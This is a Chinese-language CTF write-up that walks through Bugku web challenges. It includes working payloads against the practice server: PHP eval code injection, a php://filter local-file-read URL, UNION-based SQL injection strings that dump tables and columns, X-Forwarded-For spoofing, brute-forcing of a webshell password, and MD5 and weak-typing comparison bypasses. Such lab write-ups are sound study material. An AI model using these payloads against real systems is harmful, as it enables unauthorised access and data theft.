bugku web篇
web2
f12查看源代码在注释语句里面
计算器
直接求给的题目
但是对input的最大输入个数做了限制可以直接f12改限制字数也可以bp抓包修改
web基础$_GET
$what=$_GET['what'];
echo $what;
if($what=='flag')
echo 'flag{****}';
地址栏直接传一个?what=flag
web基础$_POST
$what=$_POST['what'];
echo $what;
if($what=='flag')
echo 'flag{****}';
用火狐的hackbar插件传一个post参数what=flag
矛盾
$num=$_GET['num'];
if(!is_numeric($num))
{echo $num;
if($num==1)
echo 'flag{**********}';这题考察了php“==”的特性吧;在php中==于只会去判段他的值是否相等,
在不同数据类型的比较当中他会进行强制的类型转换例如 1==1a去比较的时候
会认为1a=1. 这也和php是弱类型有关
php弱类型
弱类型就是在声明一个变量的时候不用定义他的类型
例如
$a=1
$b='1'
正常情况下$a会被解析为int型
$b会被解析为字符串型
看上去是很方便但是主要在两个变量比较的时候就后又问题
$a==$b的时候返回值是true这就会产生漏洞
"0e132456789"=="0e7124511451155" //true"0e123456abc"=="0e1dddada" //false"0e1abc"==0 //true"0x1e240"=="123456" //true"0x1e240"==123456 //true"0x1e240"=="1e240" //false
例如服务器储存密码的时候如过加密后是0e12sdasd这样的
与‘0’做比较返回值是true
所以在作比较的时候尽量用===
web3
打开一直在弹框;直接吧js禁用(火狐可以直接阻止弹框)
f12见检查在script代码里面有一串加密字符看了一些是HTML编码直接拉到解码工具里面解开就得到flag了
域名解析
打开开主机的host文件配置一下就好了
# localhost name resolution is handled within DNS itself.
# 127.0.0.1 localhost
# ::1 localhost123.206.87.240 flag.baidu.com然后访问flag.baidu.com 就可以得到flag
你必须让他停下
打开发现一直在跳转开源码看一下发现这么段js代码
<script language="JavaScript">
function myrefresh(){window.location.reload();
}
setTimeout('myrefresh()',500);
</script>
直接上bp放到repeater上一直go ,flag就会出来
本地包含
<?phpinclude "flag.php";$a = @$_REQUEST['hello'];eval( "var_dump($a);");show_source(__FILE__);
?>
$_REQUEST
说明
默认情况下包含了$_GET,$_POST 和 $_COOKIE的数组。
eval()定义和用法
eval() 函数把字符串按照 PHP 代码来计算。
该字符串必须是合法的 PHP 代码,且必须以分号结尾。
**注释:**return 语句会立即终止对字符串的计算。
**提示:**该函数对于在数据库文本字段中供日后计算而进行的代码存储很有用。
只要构建恶意pload吧flag.php里面的东西打印出来就好了?hello=1);print_r(file("./flag.php")
变量1
<?php error_reporting(0);
include "flag1.php";
highlight_file(__file__);
if(isset($_GET['args'])){$args = $_GET['args'];if(!preg_match("/^\w+$/",$args)){die("args error!");}eval("var_dump($$args);");
}
?>
先看if里面的正则要求$arg由数字字母下划线组成
http://123.206.87.240:8004/index1.php?args=GLOBALS
那就直接这个形式让他打印全局变量
["ZFkwe3"]=> string(38) "flag{92853051ab894a64f7865cf3c2128b34}"
全局变量ZFkwe3里的flag就会被打印出来
web5
直接查看源代码
<div style="display:none;">([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(![]+[])[+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+!+[]]]+(+(!+[]+!+[]+!+[]+[!+[]+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(+![]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(+![]+[![]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]](!+[]+!+[]+!+[]+[!+[]+!+[]+!+[]])+(+(+!+[]+[+[]]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(+![]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(+![]+[![]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]](!+[]+!+[]+[+!+[]])[+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[])[+[]]+(+(!+[]+!+[]+[+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(+![]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(+![]+[![]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]](!+[]+!+[]+[+!+[]])+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+!+[]]]+([][[]]+[])[+[]]+([][[]]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(+(!+[]+!+[]+[+!+[]]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(+![]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(+![]+[![]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]](!+[]+!+[]+!+[]+[+!+[]])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]])()([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(+(!+[]+!+[]+[+!+[]]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(+![]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(+![]+[![]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]](!+[]+!+[]+!+[]+[+!+[]])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]])()(([]+[])[([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()[+[]])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+([][[]]+[])[!+[]+!+[]])</div>
发现一串这样的东西放到控制台直接回车就得到ctf{whatfk}全大写就是flag
头等舱
啥也没有,直接上bp,bp拦下来的数据包看上去也正常,放到repeater里面go一下flag直接出现在请求头里面。
网站被黑
御剑扫一下发现还一个http://123.206.87.240:8002/webshell/shell.php
发现是一个后门pass直接开始爆破简单尝试发现是hack直接出flag
管理员系统
刚开始以为是注入题尝试后提示:
IP禁止访问,请联系本地管理员登陆,IP已被记录.
f12 发现一个base64加密码 解开是test123
于是猜这个是密码
管理员账户密码就是admin
上bp
直接在包头加上X-FORWARDED-FOR:127.0.0.1
ok直接出flag
web4
提示查看源码
<script>
var p1 = '%66%75%6e%63%74%69%6f%6e%20%63%68%65%63%6b%53%75%62%6d%69%74%28%29%7b%76%61%72%20%61%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%70%61%73%73%77%6f%72%64%22%29%3b%69%66%28%22%75%6e%64%65%66%69%6e%65%64%22%21%3d%74%79%70%65%6f%66%20%61%29%7b%69%66%28%22%36%37%64%37%30%39%62%32%62';
var p2 = '%61%61%36%34%38%63%66%36%65%38%37%61%37%31%31%34%66%31%22%3d%3d%61%2e%76%61%6c%75%65%29%72%65%74%75%72%6e%21%30%3b%61%6c%65%72%74%28%22%45%72%72%6f%72%22%29%3b%61%2e%66%6f%63%75%73%28%29%3b%72%65%74%75%72%6e%21%31%7d%7d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%6c%65%76%65%6c%51%75%65%73%74%22%29%2e%6f%6e%73%75%62%6d%69%74%3d%63%68%65%63%6b%53%75%62%6d%69%74%3b';
eval(unescape(p1) + unescape('%35%34%61%61%32' + p2));
</script>
直接控制台unescape(p1) + unescape('%35%34%61%61%32' + p2)一下
function checkSubmit(){var a=document.getElementById("password");if("undefined"!=typeof a){if("67d709b2b54aa2aa648cf6e87a7114f1"==a.value)return!0;alert("Error");a.focus();return!1}}document.getElementById("levelQuest").onsubmit=checkSubmit;
然后将字符串:67d709b2b54aa2aa648cf6e87a7114f1填入输入框,提交可得flag
flag在index里
看见题目就大概知道是本体文件包含的漏洞
进去点击链接进到了这个文件
http://123.206.87.240:8005/post/index.php?file=show.php
直接
http://123.206.87.240:8005/post/index.php?file=index.php
不行需要查看源码
构建payload
http://123.206.87.240:8005/post/index.php?file=php://filter/read=convert.base64-encode/resource=index.php
用了php流的filter协议访问本地文件read=convert.base64-encode以bases64加密源码,resource=index.php读取目标文件
把的得到的一解码就得到flag了。
输入密码查看flag
链接里直接说了爆破题题目里又直接告诉我5位数密码
直接上bp的intruder
稍微设置一下从10000到99999步长为1
也可以直接写个字典
然后爆破出来密码是13579
输入flag就出来了
点击一百万次
网站也死掉了
之前做是直接通过hackbar传一个post值大于100000就ok了
备份是个好习惯
直接访问http://123.206.87.240:8002/web16/index.php.bak
就开始下载index.php.bak了 用编辑器打开就index.php的源码
<?phpinclude_once "flag.php";
ini_set("display_errors", 0);
$str = strstr($_SERVER['REQUEST_URI'], '?');
$str = substr($str, 1);
$str = str_replace('key', '', $str);
parse_str($str);
echo md5($key1);echo md5($key2);
if (md5($key1) == md5($key2) && $key1 !== $key2) {echo $flag . "取得flag";
}
?>
有个key关键字的过滤那就直接kekeyy
对key1,key2的值进行md5加密,并进行比较,如果md5加密的值一样而未加密的值不同,就输出flag.
palyload:http://123.206.87.240:8002/web16/index.php?kekeyy1[]=1&kekeyy2[]=2
okl
成绩单
一道非常典型的sql注入题
1,2,3正常返回
1' order by 4#返回正常1' order by 5#异常说明一个4列数据
先手历一下-1' union select 1,2,3,4#正常直接开始爆库
-1' union select 1,2,3,database()#得到数据库skctf_flag
接着爆表
-1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()#
得到表名fl4g,sc
爆字段
-1' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=0x666c3467#
得到字段skctf_flag
直接可以查数据了
id=-1' union select 1,2,3,skctf_flag from fl4g#
就直接得到flag。
秋名山老司机
因为要2s内算出我反正是做不到的
用python直接扒下来再发送一个post请求
import requests
import re
from bs4 import BeautifulSoupurl = "http://123.206.87.240:8002/qiumingshan/"
session = requests.session()
r = session.get(url)
r.encoding = "utf8"
print(r.text)a = re.compile(r"<div>(.*?)</div>")
div = re.findall(r"<div>(.*?)</div>", r.text)
print(div)soup = BeautifulSoup(r.text,"html5lib")
for div in soup.select('div'):calc = div.textcalc = calc[:-3]result = eval(calc)result = {"value":result}r = session.post(url,data=result)print(r.text)
可能网络波动原因有的时候出不来,多run几次就会出来。
速度要快
源码里有
<!-- OK ,now you have to post the margin what you find -->
啥都不知道先抓个包
go一下发现再包头里有一个flag但是每次都不一样
flag: 6LeR55qE6L+Y5LiN6ZSZ77yM57uZ5L2gZmxhZ+WQpzogT0RrMU9UYzA=
base64解码看看
跑的还不错,给你flag吧: ODk1OTc0
大概有点头绪了
margin 是css的一个属性给的flag再解密一次就是数字:895974
那是不是直接通过post传一个margin=895974就可以了
因为每次刷新都会变化我们用python来
import requests
import base64
import re
url='http://123.206.87.240:8002/web6/'
r=requests.session()
s=r.get(url)
flag=s.headers['flag']
mid=base64.b64decode(flag)
mid=mid.decode()
flag=base64.b64decode(mid.split(':')[1])
data={'margin':flag}
print (r.post(url,data=data).text)
跑一下就出来了KEY{111dd62fcd377076be18a}
cookies欺骗
